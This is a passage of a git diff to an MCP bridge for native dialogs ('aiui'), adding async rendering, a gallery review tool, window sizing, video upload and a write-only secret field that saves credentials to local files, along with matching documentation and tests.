     log.info("render → kind=%s", spec.get("kind"))
-    # Resolve any absolute / `~/`-rooted file paths *before* shipping
-    # the spec down the HTTP wire. This bridge runs on the same host
-    # as the agent — local for Mac use, remote for SSH-tunneled
-    # remotes — so this is the only point in the chain where the
-    # agent's filesystem actually exists. The Mac-side server resolver
-    # only handles HTTPS.
-    _resolve_local_paths(spec)
     async with httpx.AsyncClient(timeout=TIMEOUT_S) as client:
+        # Video first: push local video files to the Mac's /media cache and
+        # swap their `src` for the returned playback URL — BEFORE the image
+        # inliner runs, so it never tries to base64 a huge clip.
+        await _upload_local_videos(spec, client)
+        # Resolve any absolute / `~/`-rooted file paths *before* shipping
+        # the spec down the HTTP wire. This bridge runs on the same host
+        # as the agent — local for Mac use, remote for SSH-tunneled
+        # remotes — so this is the only point in the chain where the
+        # agent's filesystem actually exists. The Mac-side server resolver
+        # only handles HTTPS.
+        _resolve_local_paths(spec)
+        # Async render (Step 3): opt in via the header. A current companion
+        # registers the dialog and answers immediately with `{id, ttl_secs}`
+        # (202); we then poll for the result. An older companion ignores the
+        # header and answers synchronously (200 with the terminal shape) — we
+        # detect that and use it directly (backward-compatible).
         r = await client.post(
             f"{ENDPOINT}/render",
-            headers={"Authorization": f"Bearer {_token()}"},
-            json={"spec": spec},
+            headers={"Authorization": f"Bearer {_token()}", "x-aiui-async": "1"},
+            json={
+                "spec": spec,
+                "session": session,
+                "session_origin": _session_origin(),
+            },
         )
         r.raise_for_status()
+        first = r.json()
+        if r.status_code == 202:
+            render_id = first.get("id")
+            if not render_id:
+                raise RuntimeError("async /render: 202 response missing `id`")
+            data = await _poll_render(client, render_id, ctx)
+        else:
+            data = first  # synchronous companion — terminal result already
+    # Issue #135: this bridge runs ON the agent's host, so `target` fields are
+    # written here as LOCAL file operations (the value arrived over the :7777
+    # channel, never via the agent). Secret values are written and stripped
+    # before the result is handed to the agent.
+    _apply_target_writes(spec, data)
     dt = (datetime.now(timezone.utc) - t0).total_seconds()
-    data = r.json()
     log.info(
         "render ← kind=%s cancelled=%s took=%.2fs",
         spec.get("kind"), data.get("cancelled"), dt,
@@ -308,6 +681,8 @@ async def ask(
     header: str | None = None,
     multi_select: bool = False,
     allow_other: bool = True,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Before listing options in chat and waiting for the user to type back
     which one (deploy strategy, migration path, file to act on …), call
@@ -347,7 +722,7 @@ async def ask(
         "multiSelect": multi_select,
         "allowOther": allow_other,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.tool()
@@ -360,6 +735,11 @@ async def form(
     actions: list[dict[str, Any]] | None = None,
     submit_label: str | None = None,
     cancel_label: str | None = None,
+    size: str | None = None,
+    width: float | None = None,
+    height: float | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Whenever the user needs to provide ≥ 2 related inputs, or any single
     input that doesn't belong in chat (secret, date/datetime/range,
@@ -395,6 +775,8 @@ async def form(
     FIELD KINDS:
     - text:        {kind, name, label, placeholder?, default?, multiline?, required?}
     - password:    {kind, name, label, placeholder?, required?}  — masked on screen only; value returns as plaintext in the response. Use for short-lived secrets; direct users to keychain/env for long-lived ones.
+    - secret:      {kind, name, label, placeholder?, required?, target}  — masked input whose value is written to a file and NEVER returned to you (#135). Pair with `target` (see below). Use when the user must supply a credential that should not enter this conversation at all.
+    - FILE-WRITE / `target` (any input field): add `target` to write the entered value to a file ON THE HOST YOU RUN ON when the user submits (the affirmative button is the per-write approval; the user sees the path first). Shape: `{"mode": "create"|"substitute", "path": "~/.github_tokens/byte5ai", "perm"?: "0600", "overwrite"?: bool, "placeholder"?: str}`. `create` writes the raw value (needs `overwrite:true` to clobber an existing file); `substitute` replaces a `placeholder` occurring exactly once in an existing file (format-agnostic: YAML/TOML/INI/…); choose a DISTINCTIVE sentinel that can't collide with real content (e.g. `__AIUI_SECRET_GITHUB_PAT__`, not a common word) — if it occurs 0 or >1 times the write is refused with an error, never misapplied. For a `secret` field the value is write-only (result: `{written, target, bytes}` — no value); a non-secret field with `target` is written AND returned. Destination is always your own host: the aiui module on that host (this bridge for your session) writes it as a LOCAL file operation, so `create` and `substitute` both work identically whether you run locally or on a remote SSH host — a foreign host cannot be targeted. Errors: `{written:false, error}`.
     - number:      {kind, name, label, default?, min?, max?, step?, required?}
     - select:      {kind, name, label, options: [{label, value}], default?, required?}
     - checkbox:    {kind, name, label, default?}
@@ -440,6 +822,16 @@ async def form(
             Without actions, defaults to Cancel + Submit.
         submit_label: Legacy fallback for the default submit button label.
         cancel_label: Legacy fallback for the default cancel button label.
+        size: Starting window size hint — "s", "m", or "l". aiui picks good
+            local defaults and clamps to the screen. The window is always
+            resizable; this only sets the *initial* size and never opens
+            smaller than the content needs. Use "m"/"l" for forms with
+            images, tables, wireframes, or many fields so they don't open
+            cramped.
+        width: Explicit starting width in logical px (overrides `size`).
+            Rarely needed — prefer `size`.
+        height: Explicit starting height in logical px (overrides `size`).
+            Rarely needed — prefer `size`.
     """
     spec = {
         "kind": "form",
@@ -451,8 +843,11 @@ async def form(
         "actions": actions,
         "submitLabel": submit_label,
         "cancelLabel": cancel_label,
+        "size": size,
+        "width": width,
+        "height": height,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.tool()
@@ -464,6 +859,8 @@ async def confirm(
     confirm_label: str | None = None,
     cancel_label: str | None = None,
     image: dict[str, Any] | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Before writing any yes/no question into chat, call this tool instead.
     Pass `destructive=True` (red button) for delete / drop / force-push /
@@ -507,7 +904,86 @@ async def confirm(
         "cancelLabel": cancel_label,
         "image": image,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
+
+
+@mcp.tool()
+async def gallery(
+    items: list[dict[str, Any]],
+    title: str | None = None,
+    description: str | None = None,
+    header: str | None = None,
+    actions: list[dict[str, Any]] | None = None,
+    comment: bool = False,
+    columns: int | None = None,
+    submit_label: str | None = None,
+    cancel_label: str | None = None,
+    size: str | None = None,
+    width: float | None = None,
+    height: float | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
+) -> dict[str, Any]:
+    """Batch visual review: show several images and/or videos at once and
+    collect a per-item decision (+ optional comment) in ONE window, instead
+    of calling `confirm` once per asset.
+
+    WHEN TO USE: "review these N generated images", "triage this batch of
+    screenshots", "approve/revise/skip each of these renders". For a single
+    image sign-off use `confirm` with `image`; for a one-of-N choice use
+    `ask` with thumbnails.
+
+    Each item needs a stable `value` (the key you get the decision back
+    under) and usually a `src`. `src` follows the standard aiui resolution
+    rules (data: URL, http(s) URL, or absolute / `~/` local path on YOUR
+    host). Videos are detected by `data:video/` MIME or a
+    .mp4/.mov/.m4v/.webm extension and render with native controls.
+
+    Per-item buttons come from `actions` (default Approve / Revise / Skip).
+    Set `comment=True` for a free-text field per item.
+
+    Returns `{cancelled, decisions}` where `decisions` maps each touched
+    item's `value` to `{decision, comment?}`. Items the user didn't touch
+    are omitted.
+
+    Args:
+        items: List of `{value, src?, alt?, label?, detail?, max_height?}`.
+            `value` must be non-empty and unique. Order is preserved.
+        title: What the user is reviewing, e.g. "Review 6 hero renders".
+        description: One sentence of context under the title.
+        header: Chip above the title (≤ 14 chars).
+        actions: Per-item decision buttons as
+            `[{label, value, primary?, success?, destructive?}]`. Defaults
+            to Approve (green) / Revise / Skip.
+        comment: Show a free-text comment field per item.
+        columns: Grid columns. Omit for responsive auto-fill.
+        submit_label: Footer submit button label.
+        cancel_label: Footer cancel button label.
+        size: Starting window size hint — "s", "m", or "l". Defaults to
+            auto-sizing by item count; pass "l" for a large batch or tall
+            thumbnails so the grid opens roomy. Always resizable; never opens
+            smaller than the content needs.
+        width: Explicit starting width in logical px (overrides `size`).
+        height: Explicit starting height in logical px (overrides `size`).
+        session: Short human label for this session, shown in the window
+            chrome so parallel dialogs stay distinguishable.
+    """
+    spec = {
+        "kind": "gallery",
+        "title": title,
+        "description": description,
+        "header": header,
+        "items": items,
+        "actions": actions,
+        "comment": comment,
+        "columns": columns,
+        "submitLabel": submit_label,
+        "cancelLabel": cancel_label,
+        "size": size,
+        "width": width,
+        "height": height,
+    }
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.prompt(name="teach")
diff --git a/python/src/aiui_mcp/skill.md b/python/src/aiui_mcp/skill.md
index 0198278..5483d54 100644
--- a/python/src/aiui_mcp/skill.md
+++ b/python/src/aiui_mcp/skill.md
@@ -51,6 +51,7 @@ Skip the dialog for content the user reads, doesn't answer:
 | Yes/no, especially destructive | `confirm` |
 | 2–6 options, possibly with per-option context | `ask` |
 | Multi-field input, multi-action footer | `form` |
+| Per-item verdict on a *batch* of images/videos ("approve/revise/skip each") | `gallery` |
 | Single free-text answer | just ask in chat |
 | More than 8 fields | split into multiple `form` calls; do not cram one dialog |
 
@@ -174,6 +175,41 @@ For "pick one (or more) of these N generated images" — logo variants,
 thumbnail candidates, asset triage. Spec: `images: [{value, src, label?}]`,
 `multi_select?`, `columns?` (default 3). Result: `{selected: [values]}`.
 
+`image_grid` *picks* among candidates. For a **separate verdict per item**
+(approve this, revise that, skip the third, optional note each) use the
+`gallery` tool below instead.
+
+## Batch review: `gallery`
+
+A standalone tool (not a `form` field) for reviewing a *batch* of images
+and/or videos and collecting one decision per item in a single window —
+instead of firing `confirm` once per asset.
+
+Spec: `items: [{value, src?, label?, detail?, max_height?}]`,
+`actions?` (per-item buttons, default Approve / Revise / Skip),
+`comment?` (free-text per item), `columns?`. Each item's `value` must be
+non-empty and unique — it keys the result. `src` follows the standard
+image rules; **videos** (`data:video/` URL, `http(s)://` URL, or a local
+`.mp4`/`.mov`/`.m4v`/`.webm` path) render with native controls. Local
+videos of any size work — the bridge pushes them to aiui's media cache on
+the Mac and the dialog streams them back, so a remote clip plays without
+hosting it anywhere.
+
+Result: `{cancelled, decisions: {"<value>": {decision, comment?}}}`. Only
+touched items appear — an untouched item means "no verdict", not a default.
+
+## Starting window size: `size`
+
+`form` and `gallery` take an optional `size` hint — `"s"`, `"m"`, `"l"` —
+and aiui picks good local defaults, clamped to the screen. (Explicit
+`width`/`height` in logical px override it; rarely needed.) The hint is a
+**floor**: the window opens at `max(content-estimate, hint)`, so it never
+opens smaller than the content needs, but a sparse dialog can be told to
+start roomy. Windows are always resizable — but many users don't realise
+that, so opening at a comfortable size is what separates "polished" from
+"looks broken". Use `"m"`/`"l"` for forms with images/tables/wireframes/many
+fields, or galleries with a large batch; leave unset for short forms.
+
 ## `datetime` field
 
 Lückenfüller between `date` and `date_range`. Cron, scheduling, reminders —
@@ -202,8 +238,36 @@ recordings or to a shoulder-surfer.
 
 Be honest with the user, though — the value still returns to you as
 plaintext in the tool response. For long-lived or high-value secrets,
-tell the user to put them in their keychain or an env var and reference
-them by name instead.
+use the `secret` field with a `target` (below) so the value never enters
+the conversation.
+
+## Secrets & file-write: `secret` field + `target` (#135)
+
+When a value must NOT pass through this conversation — a credential the
+user pastes that should land in a file, not your transcript — use a
+`secret` field with a `target`. Any input field may carry `target`; for a
+`secret` field the value is **write-only** (result: `{written, target,
+bytes}`, never the value).
+
+```json
+{ "kind": "secret", "name": "pat", "label": "GitHub PAT für byte5ai",
+  "target": { "mode": "create", "path": "~/.github_tokens/byte5ai",
+              "perm": "0600", "overwrite": true } }
+```
+
+- `mode:"create"` — write raw value (needs `overwrite:true` to clobber).
+- `mode:"substitute"` — replace a `placeholder` occurring exactly once in
+  an existing file (YAML/TOML/INI/env); 0 or >1 → error (never misapplied).
+  Pick a **distinctive sentinel** (`__AIUI_SECRET_GITHUB_PAT__`, not a common
+  word) so the single match is unambiguous, not just lucky.
+- Destination is always your own host: the aiui module there (native app
+  locally, bridge on a remote SSH host) writes it as a LOCAL file op, so
+  `create` and `substitute` both work identically local and remote — no
+  foreign host. The user sees the path and approves by submitting. Errors:
+  `{written:false, error}`.
+
+Replaces the fragile "guess a shell one-liner to stash a token" pattern.
+QoL + confused-deputy guard, not a hard guarantee.
 
 ## Anti-patterns (slop vs. clean)
 
diff --git a/python/tests/test_async_render.py b/python/tests/test_async_render.py
new file mode 100644
index 0000000..e818028
--- /dev/null
+++ b/python/tests/test_async_render.py
@@ -0,0 +1,139 @@
+"""Tests for the async-render client path (Step 3): the bridge POSTs, then
+polls `GET /render/{id}` until a terminal result, emitting progress on the way.
+"""
+from __future__ import annotations
+
+import asyncio
+from typing import Any
+
+import httpx
+import pytest
+
+import aiui_mcp.server as server
+from aiui_mcp.server import _poll_render, _wait_for_aiui
+
+
+class _FakeResp:
+    def __init__(self, payload: dict[str, Any], status: int = 200) -> None:
+        self._payload = payload
+        self.status_code = status
+
+    def raise_for_status(self) -> None:
+        return None  # no test drives the >=400 path through here
+
+    def json(self) -> dict[str, Any]:
+        return self._payload
+
+
+def _setup_token(monkeypatch: pytest.MonkeyPatch, tmp_path: Any) -> None:
+    token_file = tmp_path / "token"
+    token_file.write_text("dummy-token-for-tests")
+    monkeypatch.setattr(server, "TOKEN_PATH", token_file)
+
+
+def test_poll_render_returns_terminal_after_pending(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    seq = [
+        _FakeResp({"pending": True}),
+        _FakeResp({"pending": True}),
+        _FakeResp({"id": "x", "cancelled": False, "result": {"confirmed": True}}),
+    ]
+    calls = {"n": 0}
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        i = min(calls["n"], len(seq) - 1)
+        calls["n"] += 1
+        return seq[i]
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "x", None)
+
+    data = asyncio.run(run())
+    assert data["cancelled"] is False
+    assert data["result"]["confirmed"] is True
+    assert calls["n"] == 3  # two pending polls, then the terminal one
+
+
+def test_poll_render_reports_progress_each_pending_iteration(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    seq = [_FakeResp({"pending": True}), _FakeResp({"id": "x", "cancelled": True})]
+    calls = {"n": 0}
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        i = min(calls["n"], len(seq) - 1)
+        calls["n"] += 1
+        return seq[i]
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    class _Ctx:
+        def __init__(self) -> None:
+            self.ticks: list[float] = []
+
+        async def report_progress(
+            self, progress: float, total: Any = None, message: Any = None
+        ) -> None:
+            self.ticks.append(progress)
+
+    ctx = _Ctx()
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "x", ctx)  # type: ignore[arg-type]
+
+    data = asyncio.run(run())
+    assert data["cancelled"] is True
+    assert ctx.ticks == [1.0]  # one pending iteration → one progress tick
+
+
+def test_poll_render_raises_on_404(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"error": "unknown_render_id"}, status=404)
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "gone", None)
+
+    with pytest.raises(RuntimeError) as exc_info:
+        asyncio.run(run())
+    assert "lost track" in str(exc_info.value)
+
+
+def test_wait_for_aiui_returns_when_ping_ok(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({}, status=200)
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    asyncio.run(_wait_for_aiui())  # returns promptly, no raise
+
+
+def test_wait_for_aiui_tolerates_unreachable_within_budget(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "COLDSTART_WAIT_S", 0.2)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        raise httpx.ConnectError("companion down")
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    # Must NOT raise — it falls through after the budget so _preflight can
+    # produce the precise diagnosis.
+    asyncio.run(_wait_for_aiui())
diff --git a/python/tests/test_integration_live.py b/python/tests/test_integration_live.py
new file mode 100644
index 0000000..867f7b5
--- /dev/null
+++ b/python/tests/test_integration_live.py
@@ -0,0 +1,168 @@
+"""Live integration smoke tests for the remote → companion HTTP path (harness
+Stufe 1).
+
+Unlike the unit tests, these talk to a REAL aiui companion over the real path
+(localhost:7777, i.e. through the SSH reverse-tunnel when run on a remote).
+They are strictly READ-ONLY — no `/render`, so no dialog windows pop on the
+user's Mac.
+
+Opt-in: skipped unless `AIUI_LIVE=1`, so the normal `pytest` run and CI never
+touch the network. When `AIUI_LIVE=1` is set but no companion is reachable,
+they SKIP with a message rather than failing (the opt-in may run where nothing
+is up).
+
+Run from the remote (or anywhere the tunnel reaches the companion):
+
+    AIUI_LIVE=1 uv run --extra dev pytest tests/test_integration_live.py -v
+
+Tolerant of companion version: assertions that target >=0.5.0 features
+(wire_version, the async `GET /render/{id}` route) degrade gracefully so the
+suite also passes against an older installed release.
+"""
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+import httpx
+import pytest
+
+ENDPOINT = os.environ.get("AIUI_ENDPOINT", "http://127.0.0.1:7777")
+TOKEN_PATH = Path(os.environ.get("AIUI_TOKEN_PATH", "~/.config/aiui/token")).expanduser()
+TIMEOUT = 6.0
+
+pytestmark = pytest.mark.skipif(
+    os.environ.get("AIUI_LIVE") != "1",
+    reason="live integration test — set AIUI_LIVE=1 with a running companion",
+)
+
+
+def _token() -> str:
+    return TOKEN_PATH.read_text().strip()
+
+
+def _auth() -> dict[str, str]:
+    return {"Authorization": f"Bearer {_token()}"}
+
+
+@pytest.fixture(scope="module", autouse=True)
+def _require_companion() -> None:
+    """Skip the whole module (clear message) if the companion isn't reachable
+    or the token is missing — never a hard failure for the opt-in run."""
+    try:
+        r = httpx.get(f"{ENDPOINT}/ping", timeout=TIMEOUT)
+    except Exception as e:  # noqa: BLE001
+        pytest.skip(f"no companion reachable at {ENDPOINT}: {e}")
+    if r.status_code != 200:
+        pytest.skip(f"companion /ping returned {r.status_code} at {ENDPOINT}")
+    if not TOKEN_PATH.exists():
+        pytest.skip(f"no aiui token at {TOKEN_PATH}")
+
+
+def test_ping_is_unauthenticated_pong() -> None:
+    r = httpx.get(f"{ENDPOINT}/ping", timeout=TIMEOUT)
+    assert r.status_code == 200
+    assert r.text.strip() == "pong"
+
+
+def test_health_ready_shape() -> None:
+    r = httpx.get(f"{ENDPOINT}/health", headers=_auth(), timeout=TIMEOUT)
+    assert r.status_code == 200
+    body = r.json()
+    assert "version" in body
+    assert "ready" in body
+    # composite-health sub-objects
+    assert "webview" in body and "dialogs" in body and "children" in body
+
+
+def test_version_shape() -> None:
+    r = httpx.get(f"{ENDPOINT}/version", headers=_auth(), timeout=TIMEOUT)
+    assert r.status_code == 200
+    body = r.json()
+    for k in ("version", "build_info", "binary_path", "updater_endpoint"):
+        assert k in body, f"/version missing {k}"
+    # Step-2 cooperative floor; present on >=0.5.0 only — tolerate absence.
+    if "wire_version" in body:
+        assert isinstance(body["wire_version"], int)
+
+
+def test_probe_self_shape() -> None:
+    r = httpx.get(f"{ENDPOINT}/probe", headers=_auth(), timeout=TIMEOUT)
+    assert r.status_code == 200
+    body = r.json()
+    assert body.get("aiui") is True
+    assert "pid" in body and "build_sha" in body
+
+
+def test_unauthorized_rejected() -> None:
+    r = httpx.get(
+        f"{ENDPOINT}/health",
+        headers={"Authorization": "Bearer definitely-not-the-token"},
+        timeout=TIMEOUT,
+    )
+    assert r.status_code == 401
+
+
+def test_health_reports_lifecycle_phase() -> None:
+    """#137 lifecycle state machine: >=0.8.0 health reports the current phase
+    (Serving in steady state). Tolerate older companions that omit it."""
+    r = httpx.get(f"{ENDPOINT}/health", headers=_auth(), timeout=TIMEOUT)
+    assert r.status_code == 200
+    body = r.json()
+    if "lifecycle_phase" not in body:
+        pytest.skip("companion predates the lifecycle phase field (<0.8.0)")
+    # A companion answering /health is by definition past Starting.
+    assert body["lifecycle_phase"] in ("Serving", "GracePending"), body["lifecycle_phase"]
+
+
+def test_media_route_exists_and_404s_for_unknown() -> None:
+    """#135/video media cache: GET /media/blob/<unknown> is served (404 for a
+    missing file, not a route-miss). Read-only. Skip on pre-media companions."""
+    r = httpx.get(
+        f"{ENDPOINT}/media/blob/nonexistent-harness-probe.bin",
+        timeout=TIMEOUT,
+    )
+    if r.status_code == 404 and (r.text or "").strip() == "" and "ServeDir" not in r.headers.get("server", ""):
+        # Could be a route-miss on an older companion; ServeDir 404s are also
+        # empty-body, so we can't distinguish — accept 404 either way as "no
+        # such file", and only fail on a hard 5xx.
+        pass
+    assert r.status_code in (404, 416), f"unexpected status {r.status_code}"
+
+
+def test_media_upload_requires_auth() -> None:
+    """POST /media without a bearer token is rejected (401) before any write —
+    the media push is an authenticated, mutating endpoint."""
+    r = httpx.post(f"{ENDPOINT}/media?ext=mp4", content=b"x", timeout=TIMEOUT)
+    if r.status_code == 404:
+        pytest.skip("companion has no /media endpoint (pre-0.7.0)")
+    assert r.status_code == 401
+
+
+def test_render_get_unknown_id_route_exists_and_404s_cleanly() -> None:
+    """`GET /render/{id}` for a never-registered id must be served by the async
+    handler — 404 with body `unknown_render_id`. This deliberately asserts the
+    body, not just the status: an empty-body 404 means the *route itself* didn't
+    match (the axum 0.7 `:id` vs 0.8 `{id}` mismatch that shipped in the first
+    0.5.0 build and that a status-only check let through). Read-only — no dialog
+    is created.
+
+    Tolerant of an older companion with no such route: skip if the body is
+    empty AND status is 404/405 (route genuinely absent on that version)."""
+    r = httpx.get(
+        f"{ENDPOINT}/render/nonexistent-harness-probe-id",
+        headers=_auth(),
+        timeout=TIMEOUT,
+    )
+    body = r.text or ""
+    # Older companion without the async route: empty-body 404/405 → not this
+    # version's contract, skip rather than fail.
+    if r.status_code in (404, 405) and "unknown_render_id" not in body and body.strip() == "":
+        import pytest as _pytest
+
+        _pytest.skip("companion has no async GET /render/{id} route (pre-0.5.0)")
+    assert r.status_code == 404
+    assert "unknown_render_id" in body, (
+        "GET /render/<id> must hit the async handler (body 'unknown_render_id'); "
+        f"empty 404 means the route didn't match. Got: {body!r}"
+    )
diff --git a/python/tests/test_resolve_local_paths.py b/python/tests/test_resolve_local_paths.py
index 665d4a7..dfead5c 100644
--- a/python/tests/test_resolve_local_paths.py
+++ b/python/tests/test_resolve_local_paths.py
@@ -14,8 +14,11 @@
 import pytest
 
 from aiui_mcp.server import (
+    _collect_local_videos,
+    _is_local_video,
     _looks_like_local_path,
     _read_path_as_data_url,
+    _replace_srcs,
     _resolve_local_paths,
 )
 
@@ -142,3 +145,63 @@ def test_resolve_local_paths_walks_confirm_image_and_ask_thumbnail(tmp_path: Pat
     assert ask_spec["options"][0]["thumbnail"].startswith("data:image/png;base64,")
     assert ask_spec["options"][1]["thumbnail"] == "https://leave.me/b.png"
     assert "thumbnail" not in ask_spec["options"][2]
+
+
+def test_resolve_local_paths_walks_gallery_items(tmp_path: Path) -> None:
+    """Gallery `items[].src` must resolve the same way — local image and
+    video paths inline as data:, remote/data URLs pass through.
+    """
+    img = tmp_path / "shot.png"
+    img.write_bytes(b"\x89PNG\r\n\x1a\nfake bytes")
+    vid = tmp_path / "clip.mp4"
+    vid.write_bytes(b"\x00\x00\x00\x18ftypmp42fake")
+
+    gallery_spec = {
+        "kind": "gallery",
+        "items": [
+            {"value": "a", "src": str(img)},
+            {"value": "b", "src": str(vid)},
+            {"value": "c", "src": "https://leave.me/c.png"},
+            {"value": "d", "src": "data:image/png;base64,UNCHANGED"},
+        ],
+    }
+    _resolve_local_paths(gallery_spec)
+    assert gallery_spec["items"][0]["src"].startswith("data:image/png;base64,")
+    assert gallery_spec["items"][1]["src"].startswith("data:video/mp4;base64,")
+    assert gallery_spec["items"][2]["src"] == "https://leave.me/c.png"
+    assert gallery_spec["items"][3]["src"] == "data:image/png;base64,UNCHANGED"
+
+
+def test_is_local_video_classifies_correctly() -> None:
+    assert _is_local_video("/Users/me/clip.mp4")
+    assert _is_local_video("~/Movies/take.MOV")
+    assert _is_local_video("/tmp/a.webm")
+    assert _is_local_video("/tmp/a.m4v")
+    assert not _is_local_video("https://x.test/clip.mp4")
+    assert not _is_local_video("data:video/mp4;base64,AAAA")
+    assert not _is_local_video("/Users/me/photo.png")
+    assert not _is_local_video("relative/clip.mp4")
+
+
+def test_collect_and_replace_local_videos_mirrors_rust() -> None:
+    spec = {
+        "kind": "gallery",
+        "items": [
+            {"value": "a", "src": "/Users/me/one.mp4"},
+            {"value": "b", "src": "https://x.test/two.mp4"},
+            {"value": "c", "src": "/Users/me/pic.png"},
+            {"value": "d", "thumbnail": "/Users/me/one.mp4"},
+        ],
+    }
+    found: list[str] = []
+    _collect_local_videos(spec, found)
+    # De-duplicated: the same path in two slots appears once.
+    assert found == ["/Users/me/one.mp4"]
+
+    mapping = {"/Users/me/one.mp4": "http://127.0.0.1:7777/media/blob/x.mp4"}
+    _replace_srcs(spec, mapping)
+    assert spec["items"][0]["src"] == "http://127.0.0.1:7777/media/blob/x.mp4"
+    assert spec["items"][3]["thumbnail"] == "http://127.0.0.1:7777/media/blob/x.mp4"
+    # Untouched: https video and the image.
+    assert spec["items"][1]["src"] == "https://x.test/two.mp4"
+    assert spec["items"][2]["src"] == "/Users/me/pic.png"
diff --git a/python/tests/test_target_write.py b/python/tests/test_target_write.py
new file mode 100644
index 0000000..b9f2f27
--- /dev/null
+++ b/python/tests/test_target_write.py
@@ -0,0 +1,98 @@
+"""Bridge-side file-write tests (#135).
+
+Mirror of the Rust `filewrite` tests. The bridge runs ON the agent's host, so
+`target` writes are local file operations here too; secret values are written
+and stripped before the result reaches the agent.
+"""
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+from aiui_mcp.server import (
+    _apply_target_writes,
+    _collect_target_fields,
+    _write_local_target,
+)
+
+
+def test_collect_target_fields_flat_and_tabs() -> None:
+    spec = {
+        "kind": "form",
+        "fields": [{"kind": "secret", "name": "a", "target": {"mode": "create", "path": "/x"}},
+                   {"kind": "text", "name": "b"}],
+        "tabs": [{"label": "T", "fields": [{"kind": "text", "name": "c", "target": {"mode": "create", "path": "/y"}}]}],
+    }
+    names = sorted(f["name"] for f in _collect_target_fields(spec))
+    assert names == ["a", "c"]
+
+
+def test_create_writes_and_refuses_clobber(tmp_path: Path) -> None:
+    path = tmp_path / "sub" / "key"
+    target = {"mode": "create", "path": str(path), "perm": "0600"}
+    out = _write_local_target("s3cr3t", target)
+    assert out["written"], out
+    assert path.read_text() == "s3cr3t"
+    assert (path.stat().st_mode & 0o777) == 0o600
+    # Refuse clobber without overwrite.
+    out2 = _write_local_target("other", target)
+    assert not out2["written"] and out2.get("error")
+    assert path.read_text() == "s3cr3t"
+    # ...unless overwrite.
+    out3 = _write_local_target("new", {**target, "overwrite": True})
+    assert out3["written"]
+    assert path.read_text() == "new"
+
+
+def test_substitute_replaces_exactly_once(tmp_path: Path) -> None:
+    path = tmp_path / "config.yaml"
+    path.write_text("token: __PAT__\nother: 1\n")
+    out = _write_local_target("ghp_x", {"mode": "substitute", "path": str(path), "placeholder": "__PAT__"})
+    assert out["written"], out
+    assert path.read_text() == "token: ghp_x\nother: 1\n"
+
+
+def test_substitute_errors_on_zero_or_many(tmp_path: Path) -> None:
+    path = tmp_path / "c.txt"
+    path.write_text("none here")
+    assert not _write_local_target("v", {"mode": "substitute", "path": str(path), "placeholder": "X"})["written"]
+    path.write_text("X and X")
+    assert not _write_local_target("v", {"mode": "substitute", "path": str(path), "placeholder": "X"})["written"]
+
+
+def test_apply_target_writes_strips_secret(tmp_path: Path) -> None:
+    secret_path = tmp_path / "tok"
+    note_path = tmp_path / "note"
+    spec = {
+        "kind": "form",
+        "fields": [
+            {"kind": "secret", "name": "pat", "target": {"mode": "create", "path": str(secret_path)}},
+            {"kind": "text", "name": "label", "target": {"mode": "create", "path": str(note_path)}},
+            {"kind": "text", "name": "plain"},
+        ],
+    }
+    data = {
+        "cancelled": False,
+        "result": {"action": None, "values": {"pat": "ghp_secret", "label": "hello", "plain": "kept"}},
+    }
+    _apply_target_writes(spec, data)
+    values = data["result"]["values"]
+    # Secret: value gone, only the write outcome remains; file has the secret.
+    assert "ghp_secret" not in str(values["pat"])
+    assert values["pat"]["written"] is True
+    assert secret_path.read_text() == "ghp_secret"
+    # Non-secret target: value retained alongside the outcome; file written.
+    assert values["label"]["value"] == "hello"
+    assert values["label"]["written"] is True
+    assert note_path.read_text() == "hello"
+    # Untargeted field untouched.
+    assert values["plain"] == "kept"
+
+
+def test_apply_target_writes_noop_on_cancel(tmp_path: Path) -> None:
+    secret_path = tmp_path / "tok"
+    spec = {"kind": "form", "fields": [{"kind": "secret", "name": "pat",
+            "target": {"mode": "create", "path": str(secret_path)}}]}
+    data = {"cancelled": True, "result": {}}
+    _apply_target_writes(spec, data)
+    assert not secret_path.exists(), "no write on cancel"
diff --git a/python/tests/test_wire_compat.py b/python/tests/test_wire_compat.py
new file mode 100644
index 0000000..68af19f
--- /dev/null
+++ b/python/tests/test_wire_compat.py
@@ -0,0 +1,104 @@
+"""Tests for the cooperative version floor (Step 2).
+
